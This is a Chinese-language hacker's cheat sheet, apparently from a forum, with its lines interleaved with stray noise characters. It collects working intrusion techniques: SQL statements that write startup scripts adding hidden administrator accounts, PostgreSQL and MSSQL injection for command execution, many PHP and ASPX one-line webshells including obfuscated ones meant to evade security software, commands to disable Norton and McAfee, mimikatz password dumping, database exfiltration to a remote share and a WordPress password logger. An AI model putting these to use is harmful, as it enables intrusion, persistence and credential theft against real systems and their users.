中文版本操作系统中针对mysql添加用户完整代码:
# n. B1 |; |' \. g) I
5 h5 O& o6 Q4 k! R/ {! ouse test;: F2 B! Y: F5 ~' ~
create table a (cmd text);
6 D) K# t! {- x3 c' n( V8 R- M# ~* Oinsert into a values ("set wshshell=createobject (""wscript.shell"") " );' X) V5 {; Q- h: O3 c# o: `
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
. ?, ?1 I6 ^' H1 n# ^9 iinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
; ], z. C% j4 Vselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
! o4 \+ L8 q0 ~drop table a;" Q% K9 r/ L, `5 Z
. y9 J7 _" N1 S7 L8 W7 w
英文版本:, F4 s% c/ S. R) y: V% k0 W6 }0 d
$ C' Z8 F5 d0 j( `! euse test;4 S& w e+ O. P7 t/ [/ P3 ^; K
create table a (cmd text);
" Y* D/ P2 ^7 P; }) L0 U/ {( Dinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
, R5 I$ z% X: [* Qinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );' a3 J4 g; F9 h( Q7 {
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );% z" U6 B4 m- e! A- C' M) i
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
9 ?) x+ O. |- c8 {" S0 Adrop table a;5 q9 f, p) l. v8 n3 o" ^) m
7 D. }, \4 o; h0 Bcreate table a (cmd BLOB);! j- k I9 q4 Z
insert into a values (CONVERT(木马的16进制代码,CHAR));
7 P1 Q/ t. |+ [. V) x4 C* s N. ]select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe', E V( g. u; j6 Z: ^) h
drop table a;
3 i) v. G }8 _; l( l8 D
+ E3 w6 l2 x) y记录一下怎么处理变态诺顿1 w2 K4 _5 b) @
查看诺顿服务的路径 ~5 _9 p7 ^" f, _; f
sc qc ccSetMgr( o' F5 F( U8 ^. @- [
然后设置权限拒绝访问。做绝一点。。9 Y r/ L1 g% X) n" V
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system& Q: c# X( w7 D# q: a" G0 N) u, q
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
; y( R. T4 g- M; `% I- n) F) {" w8 Bcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators7 a* K1 H1 X& X1 U/ ?$ o- I
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
1 s4 ~9 _! r, H% n3 ]" }9 R5 ?: u* X$ s% C. K( [$ X
然后再重启服务器6 I/ g8 b* m/ ?: S2 A( e
iisreset /reboot* N6 }) ]" I( }. {5 A
这样就搞定了。。不过完事后。记得恢复权限。。。。
% E* l* C5 U6 L" d' n7 f5 M( `cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F8 }. J) Q& s+ ~+ \. G
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F- q* w( W& C2 a/ o4 P% N5 {5 R4 Z. h
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F0 W$ I' g ?$ w8 k) @4 z) I8 G
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
/ k0 j) p3 l R! T* [: P' K$ I" lSELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin5 [+ {) N4 E1 E# N
6 j3 K/ Z. Y# u8 [ C3 q' R1 U8 w/ uEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
* C4 }! c- v9 @/ |9 W9 q# m2 K" T5 \+ z
postgresql注射的一些东西5 e% q. z' V0 M7 T6 L
如何获得webshell! ?" M0 u: n2 y+ P; l
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); ) d/ O2 `% t# X! e
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); ! q% P( d& |1 c# Q! p/ }
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;0 m9 \; H' y2 m9 r2 v# ]5 ?
如何读文件
) J' o: q5 J1 y" uhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);: \. i# ] c, B
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;) l" t; N" ~# w5 B
http://127.0.0.1/postgresql.php?id=1;select * from myfile;3 O0 W6 b; y0 b( D6 t
: Y" }* D- r) j) E( x
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。! k$ o0 l Z7 F, e* S
当然,这些的postgresql的数据库版本必须大于8.X6 U9 d0 Y) ?% v% R3 B
创建一个system的函数:
3 V( S+ r- P; jCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT- e2 r+ w ~5 [# _5 W
8 G9 S& H7 G1 X, s$ D5 q创建一个输出表:0 _3 c. x/ ^' _: ^
CREATE TABLE stdout(id serial, system_out text)# v* s1 G1 J. K; u$ I
5 \8 S$ m/ W- D7 e y" H [+ r执行shell,输出到输出表内:# D9 P0 I8 _1 p0 Z( }5 X" c+ W# C" Z
SELECT system('uname -a > /tmp/test'): }/ q0 V% L6 b9 k) i: k3 F
# z. j: C3 P: I- ?. b5 n6 u& B
copy 输出的内容到表里面;
" c! J6 d% A7 m0 cCOPY stdout(system_out) FROM '/tmp/test'; m# Z! L0 F+ i: @$ [+ G/ L
2 P! v- D3 [( n* b
从输出表内读取执行后的回显,判断是否执行成功
9 i: L6 Z$ A% ?. D4 h: v$ w* S1 i8 Q( e# P! O
SELECT system_out FROM stdout; D0 n; J K) P7 N) Z0 a9 i
下面是测试例子
4 i; C( c. Y0 y2 n4 |
' Q5 Z( f* u: J% |3 }" B/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
. k% n0 c, x! t2 ^
- W" S; b+ r5 v( W$ _, F9 ^) y+ N/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'! x7 k& X w& i' A9 ]3 Z- O/ s5 w
STRICT --
1 v+ p1 p# r7 i% K& p; Y: c" b. a) r% X; q! a! @: j
/store.php?id=1; SELECT system('uname -a > /tmp/test') --7 h+ x# E! s7 B# L0 ?
3 `& m6 _2 j8 b" M
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
) f- O9 ^/ x1 T
/ K, F& ]( g% k( U) C- b6 \/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--1 f+ R& R; F8 T8 i5 B4 u3 |* H
net stop sharedaccess stop the default firewall
. c4 {3 o+ C* j$ f+ N1 G% Fnetsh firewall show show/config default firewall
" y& A M% H! Znetsh firewall set notifications disable disable the notify when the program is disabled by the default firewall$ L0 t. t- ]* t1 r9 Y0 B! _/ N4 E
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall M) f& i( ~0 n1 ?0 O
修改3389端口方法(修改后不易被扫出)3 j# z* | \9 ? Q: \! v. m, p# j0 A
修改服务器端的端口设置,注册表有2个地方需要修改, M- Z. u D8 Z: R: N+ P
+ o; B4 ~, G1 |1 d% t
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
! n% d* v: Q+ ]/ }PortNumber值,默认是3389,修改成所希望的端口,比如6000
, X4 M% b7 g" I% e h) {( l
7 G7 I1 @$ W% ?) M0 } Z/ L第二个地方:
: k) s8 t& J: H: o: y" F$ f[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] * i5 V3 J6 u, t9 X1 ?# p) y
PortNumber值,默认是3389,修改成所希望的端口,比如6000, A" T7 M. f S0 E) L' Q5 O
; L5 r3 w7 H& k* U! T/ ^, {! p
现在这样就可以了。重启系统就可以了4 _7 K8 F$ z$ d7 d5 g
8 _7 n; @1 s4 A* L: v
查看3389远程登录的脚本
2 @3 B9 ?: _" G保存为一个bat文件7 @" t, J8 u8 W! [6 q5 F! Y" k/ M& z
date /t >>D:\sec\TSlog\ts.log7 r L) p3 d1 a. w' F
time /t >>D:\sec\TSlog\ts.log
5 ~! q; Z/ c* _; A2 nnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log6 l3 e' n1 W* J) l
start Explorer& O+ [8 }$ P) j5 E V
& m3 L4 ~- t9 Qmstsc的参数:3 r. ~0 _- \9 s9 a. T
2 s+ P$ l2 T8 Y* [: r+ |/ e' i远程桌面连接
! ^9 q5 \9 N/ q3 g' w2 w" I, X/ ^6 q; @4 S& K% J. ?$ n
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]5 `" p6 [, v) z6 |) R5 v+ A
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
/ G! L; s0 [& M7 f2 A: t6 M! D" V- ^1 W( Y
<Connection File> -- 指定连接的 .rdp 文件的名称。
, w' J5 G. F8 k8 i; D2 O' p- @- M' o7 i& t
/v:<server[:port]> -- 指定要连接到的终端服务器。3 }6 P3 e) l) |' k
8 m+ M: Q% a/ L; [
/console -- 连接到服务器的控制台会话。! {3 C! r U9 x
& C9 ^9 X6 P( f- t- ?/f -- 以全屏模式启动客户端。
3 _2 L" A2 b, H7 y" H, D, _# Q W& S: l; w7 K* t0 U, i# z# z
/w:<width> -- 指定远程桌面屏幕的宽度。4 c c- k5 f) l6 `8 E$ n! `
- y. ^3 C! U( y- m: r" r7 F5 c3 x/h:<height> -- 指定远程桌面屏幕的高度。3 l6 k8 o; f/ G! h
6 h5 V. N# U2 P3 \6 P4 k; S/edit -- 打开指定的 .rdp 文件来编辑。
: z, A5 F' h6 f
) U6 k- }2 `' X9 M7 I/migrate -- 将客户端连接管理器创建的旧版
1 G1 {' c: J. T8 K连接文件迁移到新的 .rdp 连接文件。, T$ u: O" [( D% d5 Y
; [" J5 O3 F5 i4 M" s/ ]
" w( I8 C1 `0 l: W其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
+ R$ q2 a, f8 Kmstsc /console /v:124.42.126.xxx 突破终端访问限制数量
* W+ z- j& M5 c/ G) Q
! [. [5 g+ S- A% X9 Y命令行下开启3389
: D) O8 M+ g' ]; |5 D. @net user asp.net aspnet /add
7 i2 g* O6 i, M8 E1 U& Knet localgroup Administrators asp.net /add+ K! _' b3 w+ I* C
net localgroup "Remote Desktop Users" asp.net /add
3 f$ x7 P1 n& B+ e$ `+ H/ ^attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
4 I+ M. y7 F8 i' c8 Iecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
) X1 b3 B- ^, b/ ]6 v: Xecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 17 w' S( ]$ C' g, F
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
5 u+ Y8 U2 a* U' W" F7 |sc config rasman start= auto
% S5 P7 f8 M; z# K1 o$ G; W6 |. Tsc config remoteaccess start= auto
& C* {) Q' D3 [8 Knet start rasman# ]* |7 z3 g* s# A5 q4 g H" P
net start remoteaccess
3 S6 `9 P: ]2 m+ O+ E8 [Media/ ]4 q6 i% |% r) x
<form id="frmUpload" enctype="multipart/form-data"' F5 L8 G. {" H% L7 l' J \, B6 {
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
+ H" y o F9 U5 b& W5 k0 E<input type="file" name="NewFile" size="50"><br>
* R3 g1 }& w' b( s<input id="btnUpload" type="submit" value="Upload">% A: w; Z4 {9 t/ C- f ~
</form>) k9 n7 V. g* t, j1 y* ^0 @7 |
& X7 ^0 \/ Y2 H( C6 n- Ccontrol userpasswords2 查看用户的密码
$ f3 W# s4 ~( c; @6 a# k4 Gaccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
% ?- _# s% u+ [; eSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
: A9 h; `/ Z' `! }9 K
3 c8 |- g% N+ c141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
% z# [3 e8 z" H; `测试1:
9 V' M M" E0 E& m! r5 uSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
: ]/ p) @& y3 T4 h7 D! |( r8 R% e( ]5 O- a$ g! P% l( y
测试2:( Y* W$ _8 B0 T G- ?7 s1 m4 Y
+ e, j0 ~; @4 O7 ]3 p2 l) J7 S
create table dirs(paths varchar(100),paths1 varchar(100), id int)
( n1 k- Z) c( v, P9 ?" \1 r0 \0 x) w) V8 B9 e& X4 m3 {
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
- I! j, b" P6 D. u* g6 N9 T$ Q# M5 f" W9 X2 w* ^* P* p7 m
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
% I2 V9 E. q" m0 y K关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
! O/ @: ]1 A6 Q# N# U6 W; j可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;! \& i' H- C: ^" E
net stop mcafeeframework2 j0 }) F, F5 h0 h0 c
net stop mcshield
/ B/ i5 f7 V) L4 T2 z4 Dnet stop mcafeeengineservice1 A& p6 W$ t2 k
net stop mctaskmanager) h; G5 D& C; O5 j7 l _
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
2 e4 G a3 x/ Q) N9 @8 h" C3 N+ V8 B$ U0 B1 [6 I* |8 S
VNCDump.zip (4.76 KB, 下载次数: 1)
+ D x6 r5 A7 d# h; Z5 }+ u Y4 ?- V密码在线破解http://tools88.com/safe/vnc.php- A V3 a$ ~1 ~8 m" h+ `
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
5 [6 w, a! n0 B. h8 y3 f
& c, W) _, c$ iexec master..xp_cmdshell 'net user'
3 p+ k8 @1 O+ Z4 a& R: l- F( vmssql执行命令。5 i: _% M; _9 f: |
获取mssql的密码hash查询
0 ?4 P, y6 E/ i* G0 fselect name,password from master.dbo.sysxlogins9 o% O: C4 F k; ]" T
3 `3 a* g& A0 bbackup log dbName with NO_LOG;7 n; }$ ] w. t1 I/ m( e% u& w
backup log dbName with TRUNCATE_ONLY;% x. m3 {4 @, `
DBCC SHRINKDATABASE(dbName);0 g3 O4 Y- [% r; r! M7 B
mssql数据库压缩
% L! G' a6 B8 T, P; G2 {$ n0 P
. B( L) c1 j8 ORar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
6 g b# m: x( }+ Y将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。5 } Z* z5 }' h
; L& ]* K& D3 ]+ C1 b: M2 W
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'8 N( a2 C! d+ j; D& k3 n9 u+ ?3 Y
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
, ?2 o9 ^: n; [2 J( I* T2 j
" Z* h$ e. N2 t F% VDiscuz!nt35渗透要点:- c8 F# N" M T/ t* L# V
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
' R1 ?: x9 E- R. C(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
/ y" o" k+ e8 Z- {, O }0 S' H6 j4 f(3)保存。
2 |& [" ^3 N1 y4 r. f" M% u(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass3 h* d7 Y9 T+ |
d:\rar.exe a -r d:\1.rar d:\website\0 P8 \" l- y+ Q; t' i. V# o
递归压缩website" s9 h# r8 P b$ |$ g7 X5 h& ^
注意rar.exe的路径
9 S' w4 c: c( S+ n6 V6 `8 c& w! C0 d L h* g# G
<?php0 D1 [; K4 B8 q+ A7 V" m7 ^
: z1 i3 B: P7 m2 J) s! b' w
$telok = "0${@eval($_POST[xxoo])}";& P. F6 R D/ o. `1 G% J; J8 f
& G& O- m/ R2 v5 U$username = "123456";
( _3 B0 B4 ~/ p% |% b3 r/ x5 R; Y8 q% e9 {! f
$userpwd = "123456";
3 R7 k8 [) ` W7 B; |" V
7 _3 h' R% ^# E$telhao = "123456";
0 a! \4 ^! O9 A. g5 I- Z& U
9 O! @0 ~9 }% p# W" H2 A$telinfo = "123456";; S2 [* g0 o5 N7 G6 s/ L) A) z/ e
: @2 Y$ _; A& ~ U, V
?>) r& O' B- V8 I6 F7 S
php一句话未过滤插入一句话木马1 d& D- v: h! {, T% L' X+ O0 s! L, R; I- Y
6 z+ D; v2 D$ M5 Q9 J. f站库分离脱裤技巧! s# a5 n; {$ U/ \/ A& k
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'% V$ Q4 P5 h1 K2 Q
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'5 T9 T9 b7 J- J5 D) c
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。$ a- U- r4 ^: Q3 A% v9 u! M" b
这儿利用的是马儿的专家模式(自己写代码)。
1 q" [9 m$ ^8 @6 W; _6 x' jini_set('display_errors', 1);2 V5 ` S s+ i, [( _
set_time_limit(0);
0 u5 y! K& S9 F' \! D# N/ s: lerror_reporting(E_ALL);# d1 g# E' H+ }+ w( ^
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
$ A6 Y; q* H3 q7 H& c2 X% kmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());2 U2 L- d4 j1 A( ^- I! Z) R' r- M
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
' E# B! r H" o9 h! ~2 a& E& k$i = 0;- P* ]- a$ P3 Q; s
$tmp = '';
4 {- K! v7 m. ^9 z6 L. n, Vwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {6 V* d* @: a/ p, |- n: {1 L
$i = $i+1;
$ s& n$ I. t( C& G+ k' z: x $tmp .= implode("::", $row)."\n";3 p3 k) L7 u: Y2 G
if(!($i%500)){//500条写入一个文件: T$ M2 D* j* `4 u& K
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
4 s2 f6 [; |4 D; V5 A# M file_put_contents($filename,$tmp);" z/ L, i/ f% d& {$ J9 y# K( h
$tmp = '';
8 }9 A: `* i* Z, }5 F/ G }
D/ V, C9 e a2 e1 b" R}
6 X# n- k6 P: ]mysql_free_result($result);
; W% c# o7 u& ~2 {* a" w: \8 ?
9 L, _' b" K% E
2 T$ A( E* r; b* G: k, I% l: w
0 n j) e1 R0 Q//down完后delete% Q; I- ^% ?3 ]7 R
- [9 o1 r- I9 k: h4 W" ~+ i
) o. K% x- ^& F
ini_set('display_errors', 1);/ C; B. }3 d3 F8 R% ~9 q6 o
error_reporting(E_ALL);# V8 S$ [9 ?: G# N7 s ~
$i = 0;7 U7 I8 \) Y, Q- q3 R
while($i<32) {' V0 x; X& r$ V# T5 K$ F0 A
$i = $i+1;! V9 W8 T K8 t( S
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';- p$ K% {9 g% k# v) e' \; n$ }& i
unlink($filename);
$ c8 m* e- o1 P- e8 w& G ]}
% u" W& p" P" B* shttprint 收集操作系统指纹6 |6 ~6 I6 B3 j8 X' U6 @
扫描192.168.1.100的所有端口
8 C0 p- F: {8 Rnmap –PN –sT –sV –p0-65535 192.168.1.100
8 m9 [+ c8 y2 C/ ^# x1 ^$ }host -t ns www.owasp.org 识别的名称服务器,获取dns信息. U# P/ N. R" i8 g
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输, Y* `9 v& e4 V/ Z& n4 [! W
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
3 F: w6 ~" }$ y
( e& W$ I6 i' y( c7 ~Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
8 v! Y1 E" T3 Z" v7 j- k
2 P8 h% s/ ]( U MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
- g, r: R) m; X0 k2 g9 l+ A/ M6 f# j& d3 e T1 S
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x/ U v, k4 C# w$ K$ g* x: Y
* k0 V, ` h6 w) s
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)9 K) I* }& |2 D
4 i' a; ]0 `5 k* Q http://net-square.com/msnpawn/index.shtml (要求安装)
4 D4 X q3 R- b6 D% |) T& B
2 {$ h0 g; l' J tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
- R% l1 W/ v. y! y
1 z. d1 P; Z V2 z9 h3 { SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
5 g! V$ S6 c1 kset names gb2312
7 J5 q; [4 {1 C" s5 p导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
& z' a6 M2 a1 A
' d3 X$ d8 O2 G; Gmysql 密码修改0 j Q. K0 F. k3 v4 ~5 P) `3 h
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ”
9 P: J6 E: q# e- Oupdate user set password=PASSWORD('antian365.com') where user='root';
! B; c$ ? w& a+ P0 N( J0 Zflush privileges;
0 Q0 G& _( e; w3 P* w2 M2 l4 E高级的PHP一句话木马后门/ a- [' S6 E; X/ p5 c9 W$ u/ t
/ C9 l- F0 m7 e: Z) Q8 u; j; J6 Z入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
$ s$ h+ e. u) N! n! {$ s# o3 h; T
0 k; M* C' S2 e9 f8 ~, t& |1、
1 \' ?0 P5 N ^. Q. ]
+ K0 Y5 z' ?; ^8 W$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
- ]& c3 Q8 W$ y- T8 H4 L/ C: v! v, i; S% n* B
$hh("/[discuz]/e",$_POST['h'],"Access");
& z' E9 {5 p; ~. ^& @' S" E3 z
//菜刀一句话
# Q4 L9 ]. V( s1 m" F, j' E9 Z7 C0 {: E5 ` M$ r# y7 H
2、
; V2 ]# a( Y$ r) W4 _
; U' M& c+ v4 L$filename=$_GET['xbid'];6 g. _) f0 H8 @. c" B" C
& s' f; s5 E% Ninclude ($filename);
3 s- u# A; d$ e9 H* ?# ~! j. H7 a
5 X1 n# ?; ~$ H1 p: P; d+ c//危险的include函数,直接编译任何文件为php格式运行
/ Q5 A- A$ z2 c0 x: P+ F; l- u1 m ], U! G, x/ y. F% q; f8 O$ L8 e
3、
: T2 l# W2 O4 V; e% E6 C) W9 E1 c+ ]8 Q- k9 U! E' Z- ]0 l
$reg="c"."o"."p"."y";
/ ?. o0 Q, x7 |9 p3 b
: ^1 `( k+ e7 T6 f8 H8 q$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);4 @! e( j' i8 W1 ?8 I: v
% s$ A/ h3 e- h9 J! w//重命名任何文件
1 e+ P" D# y2 H! x" i: w" V. S6 [8 V( i# R8 p+ o; u
4、
! W8 o3 N8 E1 ~$ ^6 ~
7 `7 G/ c5 v$ Z4 [3 h! r5 {$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";* O% b G0 i8 r# _) o: p0 }
( f9 x4 N0 L* U2 V
$gzid("/[discuz]/e",$_POST['h'],"Access");# Q$ {7 s9 Y# P( ]' d
8 q/ [2 w% g6 i, s0 P) Y
//菜刀一句话9 _. T7 C. M1 S! h9 }9 N" |
/ a, e& s) E8 k/ \. u6 p! p6 ~5、include ($uid);
* A+ _' ^: V4 ]9 b- m# h/ O* L
/ b" d% ~' _" a: y* r; U; Z//危险的include函数,直接编译任何文件为php格式运行,POST : d7 F, \9 l: B/ q
0 _8 _4 T( i5 k/ k @9 {) e9 y% D0 k2 |9 y" Q, o3 e$ a
//gif插一句话
3 @# [& M# _3 B1 v% I2 r: {; A8 C {) o* ~( o) F
6、典型一句话9 ~$ p7 A; g5 D
# H( z* j4 L* l
程序后门代码
) @' H; G. M' s x<?php eval_r($_POST[sb])?>8 h7 D$ }6 @7 W0 p
程序代码
9 m1 L" O6 n2 a<?php @eval_r($_POST[sb])?>! p1 E0 X, i$ Q4 X8 i! ^3 y3 @
//容错代码! K r7 B5 y' m! I4 Z. m
程序代码
3 B8 O: A5 H; H( D4 ]<?php assert($_POST[sb]);?>/ o# x/ k$ ~" F, f' i! S, a
//使用lanker一句话客户端的专家模式执行相关的php语句
$ L/ u* t: {6 A+ B1 z程序代码& l. P/ ~2 t f
<?$_POST['sa']($_POST['sb']);?>
( [* L5 m# [" A! ]0 j) L0 @* W程序代码" t4 M) C+ c3 e: a6 Q% H! N1 }; A* X
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>+ v+ J; F( T4 s1 C$ }
程序代码- h3 ~& s$ ?; p( C1 O$ p3 Y
<?php+ t& d8 u Y6 h3 z+ ~
@preg_replace("/[email]/e",$_POST['h'],"error");+ N, @* {3 c- l* M# o
?>
6 e% u& b o$ \# H5 ^9 c, ]% p% U//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入$ N8 u3 N R* `8 Q% \3 ?
程序代码
: Q; G* @8 Z% R1 s9 S% w3 k5 H7 V<O>h=@eval_r($_POST[c]);</O>
# C. B* `' K6 G/ R! A( E- m! W程序代码9 E! N2 J* m4 ^6 ~! j4 W) w
<script language="php">@eval_r($_POST[sb])</script> J7 W( O' S! d6 b9 G: Z+ X
//绕过<?限制的一句话
4 P; e$ f8 U5 s& l8 `9 Y: b9 j
1 P: I5 P3 u; l* w5 Phttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip N" ?6 H0 g* Q$ w
详细用法:: Q9 b% D# x6 x* m% N
1、到tools目录。psexec \\127.0.0.1 cmd. g/ _ U9 N( X; @2 b
2、执行mimikatz
- `' V4 c2 e- v$ o/ t! u, Y3、执行 privilege::debug; d/ w6 w1 V6 R) F$ `3 R
4、执行 inject::process lsass.exe sekurlsa.dll# Q% |" h" b Z4 C( S) ~
5、执行@getLogonPasswords: A8 i3 T+ P9 n) i0 e
6、widget就是密码3 N' i1 r, f- } [
7、exit退出,不要直接关闭否则系统会崩溃。
f6 y0 Q& X; }% q+ v
0 m3 n; v" T+ u- L1 f' `http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
: F! F$ T3 b$ w. p( [: A( O
' h1 f( ^! w8 |5 l7 L$ Z( h3 ?( i自动查找系统高危补丁
0 i7 V) `1 O% w, z! r6 |4 T: nsysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
# n' U# q! p5 Z% s1 N
5 v( g6 Y6 O+ ~0 R) R1 q突破安全狗的一句话aspx后门* e8 U( P) z4 @1 {3 A1 @% m
<%@ Page Language="C#" ValidateRequest="false" %>$ [- c- z% E1 q9 O# Q
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
! @, X+ Y' R( ~3 H5 x7 cwebshell下记录WordPress登陆密码
" ~/ b, k3 G9 ?+ \/ c/ }2 u+ Q/ Twebshell下记录Wordpress登陆密码方便进一步社工
$ u7 y5 j0 ~$ f在文件wp-login.php中539行处添加:4 ~5 T9 x/ o# F% ]
// log password" N5 ]! h$ E) \4 T. k3 i$ v* O$ v
$log_user=$_POST['log'];; b$ B9 ]) H& K5 O6 B
$log_pwd=$_POST['pwd'];
+ S8 o$ _4 M4 c6 |. M$log_ip=$_SERVER["REMOTE_ADDR"];# R* |1 s1 g! v: l, K8 p; |8 K) c
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;; r; R0 P& h! q+ V
$txt=$txt.”\r\n”;5 ^1 Y' V% R* L0 v/ X* i
if($log_user&&$log_pwd&&$log_ip){
3 `) ~& V3 i; w$ W8 s@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
, Q5 z9 |; j* |. f1 I: @) r; S2 I}& { [+ s: c; u
